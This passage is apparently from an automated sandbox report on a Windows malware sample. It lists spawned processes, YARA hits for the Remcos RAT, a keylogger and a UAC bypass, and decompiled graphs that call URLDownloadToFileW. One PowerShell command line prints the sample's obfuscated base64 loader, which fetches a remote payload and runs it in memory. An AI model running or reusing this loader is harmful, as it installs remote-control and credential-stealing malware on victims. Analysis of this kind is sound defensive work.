                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:4
                                                                                                                  Start time:01:14:58
                                                                                                                  Start date:16/12/2024
                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\brz1t20s\brz1t20s.cmdline"
                                                                                                                  Imagebase:0x520000
                                                                                                                  File size:2'141'552 bytes
                                                                                                                  MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:moderate
                                                                                                                  Has exited:true

                                                                                                                  Target ID:5
                                                                                                                  Start time:01:14:58
                                                                                                                  Start date:16/12/2024
                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6126.tmp" "c:\Users\user\AppData\Local\Temp\brz1t20s\CSCB0966C08AE0149D5A4EAEA26C81DD572.TMP"
                                                                                                                  Imagebase:0xbf0000
                                                                                                                  File size:46'832 bytes
                                                                                                                  MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:moderate
                                                                                                                  Has exited:true

                                                                                                                  Target ID:6
                                                                                                                  Start time:01:15:03
                                                                                                                  Start date:16/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\entiretimeneedgoodthingsforgetbackbestthingswithgoodnew.vbS"
                                                                                                                  Imagebase:0xa40000
                                                                                                                  File size:147'456 bytes
                                                                                                                  MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:7
                                                                                                                  Start time:01:15:04
                                                                                                                  Start date:16/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $corythosaurus = 'JGRlc3Rvb3IgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWFudWZhY3RvcnkgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRpbGlvdGliaWFsID0gJG1hbnVmYWN0b3J5LkRvd25sb2FkRGF0YSgkZGVzdG9vcik7JEJlbGxvYyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRpbGlvdGliaWFsKTskbWlzcGVyY2VpdmVzID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRvcmJpZm9sZCA9ICc8PEJBU0U2NF9FTkQ+Pic7JGh5c3Rlcm9pZCA9ICRCZWxsb2MuSW5kZXhPZigkbWlzcGVyY2VpdmVzKTskYWRkaXRpb25hbGl0eSA9ICRCZWxsb2MuSW5kZXhPZigkb3JiaWZvbGQpOyRoeXN0ZXJvaWQgLWdlIDAgLWFuZCAkYWRkaXRpb25hbGl0eSAtZ3QgJGh5c3Rlcm9pZDskaHlzdGVyb2lkICs9ICRtaXNwZXJjZWl2ZXMuTGVuZ3RoOyR3YWdnaW5zID0gJGFkZGl0aW9uYWxpdHkgLSAkaHlzdGVyb2lkOyRyZWNyZW1lbnRzID0gJEJlbGxvYy5TdWJzdHJpbmcoJGh5c3Rlcm9pZCwgJHdhZ2dpbnMpOyRHZW5ldmEgPSAtam9pbiAoJHJlY3JlbWVudHMuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHJlY3JlbWVudHMuTGVuZ3RoKV07JGppbGxhcm9vcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJEdlbmV2YSk7JHBvbXVtID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkamlsbGFyb29zKTskbG93ZG93biA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRsb3dkb3duLkludm9rZSgkbnVsbCwgQCgnMC84VjlycS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGlzb21lcmljYWxseScsICckaXNvbWVyaWNhbGx5JywgJyRpc29tZXJpY2FsbHknLCAnQ2FzUG9sJywgJyRpc29tZXJpY2FsbHknLCAnJGlzb21lcmljYWxseScsJyRpc29tZXJpY2FsbHknLCckaXNvbWVyaWNhbGx5JywnJGlzb21lcmljYWxseScsJyRpc29tZXJpY2FsbHknLCckaXNvbWVyaWNhbGx5JywnMScsJyRpc29tZXJpY2FsbHknLCcnKSk7';$pycnaster = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($corythosaurus));Invoke-Expression $pycnaster
                                                                                                                  Imagebase:0x620000
                                                                                                                  File size:433'152 bytes
                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.2409021944.0000000006C64000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.2409021944.0000000006C64000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.2409021944.0000000006C64000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000007.00000002.2409021944.0000000006C64000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.2409021944.0000000005DFB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.2409021944.0000000005DFB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.2409021944.0000000005DFB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000007.00000002.2409021944.0000000005DFB000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:8
                                                                                                                  Start time:01:15:04
                                                                                                                  Start date:16/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:false

                                                                                                                  Target ID:10
                                                                                                                  Start time:01:15:31
                                                                                                                  Start date:16/12/2024
                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                                                                  Imagebase:0x930000
                                                                                                                  File size:108'664 bytes
                                                                                                                  MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.4497247873.0000000000D78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                  Has exited:false

                                                                                                                  Target ID:11
                                                                                                                  Start time:01:15:37
                                                                                                                  Start date:16/12/2024
                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\vgphuoqzklppcrzcpcvdcumi"
                                                                                                                  Imagebase:0xf60000
                                                                                                                  File size:108'664 bytes
                                                                                                                  MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:12
                                                                                                                  Start time:01:15:37
                                                                                                                  Start date:16/12/2024
                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\giuruybtythumfngynhenhzrnto"
                                                                                                                  Imagebase:0x6b0000
                                                                                                                  File size:108'664 bytes
                                                                                                                  MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:13
                                                                                                                  Start time:01:15:37
                                                                                                                  Start date:16/12/2024
                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\iczknrmumbzhpljkqyugqmuiwagwoan"
                                                                                                                  Imagebase:0x3b0000
                                                                                                                  File size:108'664 bytes
                                                                                                                  MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:14
                                                                                                                  Start time:01:15:37
                                                                                                                  Start date:16/12/2024
                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\iczknrmumbzhpljkqyugqmuiwagwoan"
                                                                                                                  Imagebase:0x880000
                                                                                                                  File size:108'664 bytes
                                                                                                                  MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Reset < >
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000003.2053632567.0000000006FB0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_3_6fb0000_mshta.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ffe91d5d61e579b28f4ce9266155ecd353d874fde620aad57d84fbdc84dff8c7
                                                                                                                    • Instruction ID: 947d6800daba16f0eb7a4d6e372d79a640acc8ee49baeaaa2d8e6c5473b7334b
                                                                                                                    • Opcode Fuzzy Hash: ffe91d5d61e579b28f4ce9266155ecd353d874fde620aad57d84fbdc84dff8c7
                                                                                                                    • Instruction Fuzzy Hash: A701D471F403059FEB51CFBD8CC17EEBBE5AB48210F18102DE504F7241CA7498828B90
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000003.2053650763.0000000006C10000.00000010.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_3_6c10000_mshta.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ff76918a944367de81d1e556ded582aa5f4d5553cffdb7728517409e6615f5df
                                                                                                                    • Instruction ID: 6d69c2fed1edd58faf37d78bf568fdad2af630e40dae79c8830576939e7a9d14
                                                                                                                    • Opcode Fuzzy Hash: ff76918a944367de81d1e556ded582aa5f4d5553cffdb7728517409e6615f5df
                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000003.2053650763.0000000006C10000.00000010.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_3_6c10000_mshta.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ff76918a944367de81d1e556ded582aa5f4d5553cffdb7728517409e6615f5df
                                                                                                                    • Instruction ID: 6d69c2fed1edd58faf37d78bf568fdad2af630e40dae79c8830576939e7a9d14
                                                                                                                    • Opcode Fuzzy Hash: ff76918a944367de81d1e556ded582aa5f4d5553cffdb7728517409e6615f5df
                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000003.2053650763.0000000006C10000.00000010.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_3_6c10000_mshta.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ff76918a944367de81d1e556ded582aa5f4d5553cffdb7728517409e6615f5df
                                                                                                                    • Instruction ID: 6d69c2fed1edd58faf37d78bf568fdad2af630e40dae79c8830576939e7a9d14
                                                                                                                    • Opcode Fuzzy Hash: ff76918a944367de81d1e556ded582aa5f4d5553cffdb7728517409e6615f5df
                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000003.2053650763.0000000006C10000.00000010.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_3_6c10000_mshta.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ff76918a944367de81d1e556ded582aa5f4d5553cffdb7728517409e6615f5df
                                                                                                                    • Instruction ID: 6d69c2fed1edd58faf37d78bf568fdad2af630e40dae79c8830576939e7a9d14
                                                                                                                    • Opcode Fuzzy Hash: ff76918a944367de81d1e556ded582aa5f4d5553cffdb7728517409e6615f5df
                                                                                                                    • Instruction Fuzzy Hash:

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:4.7%
                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:47
                                                                                                                    Total number of Limit Nodes:7
                                                                                                                    execution_graph 7339 4487480 7340 44875fe 7339->7340 7341 44874be 7339->7341 7341->7340 7347 4487a08 7341->7347 7356 4487da8 7341->7356 7360 4487c45 7341->7360 7368 4487a18 7341->7368 7342 44875df 7352 4487a18 7347->7352 7348 4487b30 7348->7342 7349 4487de8 URLDownloadToFileW 7351 4487ea8 7349->7351 7351->7342 7352->7348 7352->7349 7353 4487c5e 7352->7353 7377 72f45f7 7353->7377 7385 72f4610 7353->7385 7357 4487cf9 7356->7357 7357->7356 7358 72f45f7 4 API calls 7357->7358 7359 72f4610 4 API calls 7357->7359 7358->7357 7359->7357 7363 4487b9a 7360->7363 7365 4487c5e 7360->7365 7361 4487de8 URLDownloadToFileW 7364 4487ea8 7361->7364 7363->7360 7363->7361 7364->7342 7366 72f45f7 3 API calls 7365->7366 7367 72f4610 3 API calls 7365->7367 7366->7365 7367->7365 7373 4487a4c 7368->7373 7369 4487b30 7369->7342 7370 4487de8 URLDownloadToFileW 7372 4487ea8 7370->7372 7372->7342 7373->7369 7373->7370 7374 4487c5e 7373->7374 7375 72f45f7 3 API calls 7374->7375 7376 72f4610 3 API calls 7374->7376 7375->7374 7376->7374 7379 72f4610 7377->7379 7378 72f4a93 7378->7353 7379->7378 7381 4487a08 4 API calls 7379->7381 7382 4487a18 4 API calls 7379->7382 7384 4487c45 4 API calls 7379->7384 7393 4481bf8 7379->7393 7380 72f4a34 7380->7353 7381->7380 7382->7380 7384->7380 7386 72f4a93 7385->7386 7387 72f4641 7385->7387 7386->7353 7387->7386 7389 4487a08 4 API calls 7387->7389 7390 4487a18 4 API calls 7387->7390 7391 4481bf8 URLDownloadToFileW 7387->7391 7392 4487c45 4 API calls 7387->7392 7388 72f4a34 7388->7353 7389->7388 7390->7388 7391->7388 7392->7388 7394 4487e00 URLDownloadToFileW 7393->7394 7396 4487ea8 7394->7396 7396->7380

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 164 4487a18-4487a4a 165 4487a4c-4487a53 164->165 166 4487a90 164->166 167 4487a64 165->167 168 4487a55-4487a62 165->168 169 4487a93-4487acf 166->169 170 4487a66-4487a68 167->170 168->170 178 4487b58-4487b63 169->178 179 4487ad5-4487ade 169->179 172 4487a6a-4487a6d 170->172 173 4487a6f-4487a71 170->173 175 4487a8e 172->175 176 4487a82 173->176 177 4487a73-4487a80 173->177 175->169 182 4487a84-4487a86 176->182 177->182 180 4487b72-4487b94 178->180 181 4487b65-4487b68 178->181 179->178 183 4487ae0-4487ae6 179->183 190 4487b9a-4487ba3 180->190 191 4487c5e-4487cf6 180->191 181->180 182->175 185 4487de8-4487dfd 183->185 186 4487aec-4487af9 183->186 195 4487dff-4487e05 185->195 196 4487e06-4487e52 185->196 188 4487afb-4487b2e 186->188 189 4487b4f-4487b56 186->189 202 4487b4b 188->202 203 4487b30-4487b33 188->203 189->178 189->183 190->185 194 4487ba9-4487be7 190->194 231 4487cf9-4487d52 191->231 214 4487be9-4487bff 194->214 215 4487c01-4487c14 194->215 195->196 205 4487e5d-4487e63 196->205 206 4487e54-4487e5a 196->206 202->189 209 4487b3f-4487b48 203->209 210 4487b35-4487b38 203->210 207 4487e71-4487ea6 URLDownloadToFileW 205->207 208 4487e65-4487e6e 205->208 206->205 212 4487ea8-4487eae 207->212 213 4487eaf-4487ec3 207->213 208->207 210->209 212->213 217 4487c16-4487c1d 214->217 215->217 219 4487c1f-4487c30 217->219 220 4487c42-4487c58 217->220 219->220 225 4487c32-4487c3b 219->225 220->190 220->191 225->220 244 4487d55 call 72f45f7 231->244 245 4487d55 call 72f4610 231->245 236 4487d57-4487d60 237 4487d7a-4487d8d 236->237 238 4487d62-4487d78 236->238 239 4487d8f-4487d96 237->239 238->239 240 4487d98-4487d9e 239->240 241 4487da5-4487daf 239->241 240->241 241->231 244->236 245->236
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.2159803433.0000000004480000.00000040.00000800.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_4480000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0c36c0bbb64c0b9d83f1a28d50d22cd00871f6b56fe407d20e3e0855e840be5d
                                                                                                                    • Instruction ID: 5b800402c42182ef792da09ac154c92da65b8862c845540580e1775a5dad1156
                                                                                                                    • Opcode Fuzzy Hash: 0c36c0bbb64c0b9d83f1a28d50d22cd00871f6b56fe407d20e3e0855e840be5d
                                                                                                                    • Instruction Fuzzy Hash: 41E1FA75A00219AFDF05DF98D994A9EBBB6FF88310F24815AE804A7365C735ED81CB90

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 0 72f4610-72f463b 1 72f4af2-72f4b25 0->1 2 72f4641-72f4646 0->2 10 72f4b27-72f4b33 1->10 11 72f4b35 1->11 3 72f465e-72f4663 2->3 4 72f4648-72f464e 2->4 6 72f4665-72f4671 3->6 7 72f4673 3->7 8 72f4652-72f465c 4->8 9 72f4650 4->9 12 72f4675-72f4677 6->12 7->12 8->3 9->3 14 72f4b37-72f4b39 10->14 11->14 15 72f467d-72f4687 12->15 16 72f4a93-72f4a9d 12->16 19 72f4b7b-72f4b85 14->19 20 72f4b3b-72f4b42 14->20 15->1 21 72f468d-72f4692 15->21 17 72f4a9f-72f4aa8 16->17 18 72f4aab-72f4ab1 16->18 22 72f4ab7-72f4ac3 18->22 23 72f4ab3-72f4ab5 18->23 27 72f4b8e-72f4b94 19->27 28 72f4b87-72f4b8b 19->28 20->19 24 72f4b44-72f4b61 20->24 25 72f46aa-72f46b8 21->25 26 72f4694-72f469a 21->26 29 72f4ac5-72f4aef 22->29 23->29 39 72f4bc9-72f4bce 24->39 40 72f4b63-72f4b75 24->40 25->16 43 72f46be-72f46dd 25->43 30 72f469e-72f46a8 26->30 31 72f469c 26->31 32 72f4b9a-72f4ba6 27->32 33 72f4b96-72f4b98 27->33 30->25 31->25 37 72f4ba8-72f4bc6 32->37 33->37 39->40 40->19 43->16 50 72f46e3-72f46ed 43->50 50->1 51 72f46f3-72f46f8 50->51 52 72f46fa-72f4700 51->52 53 72f4710-72f4714 51->53 54 72f4704-72f470e 52->54 55 72f4702 52->55 53->16 56 72f471a-72f471e 53->56 54->53 55->53 56->16 57 72f4724-72f4728 56->57 57->16 59 72f472e-72f473e 57->59 60 72f47c6-72f4815 59->60 61 72f4744-72f476b 59->61 78 72f481c-72f482f 60->78 66 72f476d-72f4773 61->66 67 72f4785-72f47b3 61->67 68 72f4777-72f4783 66->68 69 72f4775 66->69 76 72f47b5-72f47b7 67->76 77 72f47c1-72f47c4 67->77 68->67 69->67 76->77 77->78 79 72f48b7-72f4906 78->79 80 72f4835-72f485c 78->80 97 72f490d-72f4920 79->97 85 72f485e-72f4864 80->85 86 72f4876-72f48a4 80->86 87 72f4868-72f4874 85->87 88 72f4866 85->88 95 72f48a6-72f48a8 86->95 96 72f48b2-72f48b5 86->96 87->86 88->86 95->96 96->97 98 72f49a8-72f49f7 97->98 99 72f4926-72f494d 97->99 116 72f49fe-72f4a2c 98->116 104 72f494f-72f4955 99->104 105 72f4967-72f4995 99->105 106 72f4959-72f4965 104->106 107 72f4957 104->107 114 72f4997-72f4999 105->114 115 72f49a3-72f49a6 105->115 106->105 107->105 114->115 115->116 121 72f4a2f call 4487a08 116->121 122 72f4a2f call 4487a18 116->122 123 72f4a2f call 4481bf8 116->123 124 72f4a2f call 4487c45 116->124 119 72f4a34-72f4a90 121->119 122->119 123->119 124->119
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.2163865134.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_72f0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: tP]q$tP]q
                                                                                                                    • API String ID: 0-145478062
                                                                                                                    • Opcode ID: c1fe3894456357ebbf41bec0b73bdc344e03e33e2c4afdfec1d81e412e8966fa
                                                                                                                    • Instruction ID: b386d0194ec1b15f3ca7eec71cd59d67eea8917dbd3b992ba7d324f47547fff4
                                                                                                                    • Opcode Fuzzy Hash: c1fe3894456357ebbf41bec0b73bdc344e03e33e2c4afdfec1d81e412e8966fa
                                                                                                                    • Instruction Fuzzy Hash: C1F117B0B102459FDB14AF68C850B6BFBE2FFC9710F248569EA059B350DAB1DD41CBA1

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 125 72f04f8-72f050a 126 72f05ca-72f05fd 125->126 127 72f0510-72f0521 125->127 132 72f05ff-72f063e 126->132 133 72f066b-72f0675 126->133 130 72f053b-72f0558 127->130 131 72f0523-72f0529 127->131 130->126 144 72f055a-72f057c 130->144 134 72f052d-72f0539 131->134 135 72f052b 131->135 154 72f06bb-72f06c0 132->154 155 72f0640-72f064e 132->155 136 72f0677-72f067d 133->136 137 72f0680-72f0686 133->137 134->130 135->130 140 72f068c-72f0698 137->140 141 72f0688-72f068a 137->141 142 72f069a-72f06b8 140->142 141->142 149 72f057e-72f0584 144->149 150 72f0596-72f05ae 144->150 152 72f0588-72f0594 149->152 153 72f0586 149->153 160 72f05bc-72f05c7 150->160 161 72f05b0-72f05b2 150->161 152->150 153->150 154->155 163 72f0656-72f0665 155->163 161->160 163->133
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.2163865134.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_72f0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: tP]q$tP]q
                                                                                                                    • API String ID: 0-145478062
                                                                                                                    • Opcode ID: e1bc2adbf25983227db7b38e1e3c3959a8c61053d4ff6fc92e55dd5817862e40
                                                                                                                    • Instruction ID: b0c6e4a6cc11368dda71fb1b6fa027628cde2a03dace20aa1acfbb58641a7ea9
                                                                                                                    • Opcode Fuzzy Hash: e1bc2adbf25983227db7b38e1e3c3959a8c61053d4ff6fc92e55dd5817862e40
                                                                                                                    • Instruction Fuzzy Hash: 295159B0B102159FC7248B688850B2AFBE2FFC5710F54C46AEA44DF292CA71DC45C7A1

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 246 4481bf8-4487e52 250 4487e5d-4487e63 246->250 251 4487e54-4487e5a 246->251 252 4487e71-4487ea6 URLDownloadToFileW 250->252 253 4487e65-4487e6e 250->253 251->250 254 4487ea8-4487eae 252->254 255 4487eaf-4487ec3 252->255 253->252 254->255
                                                                                                                    APIs
                                                                                                                    • URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 04487E99
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.2159803433.0000000004480000.00000040.00000800.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_4480000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DownloadFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1407266417-0
                                                                                                                    • Opcode ID: 829be7aeac15ecbca4460782524b764259084677b483409af401796d5fdecce6
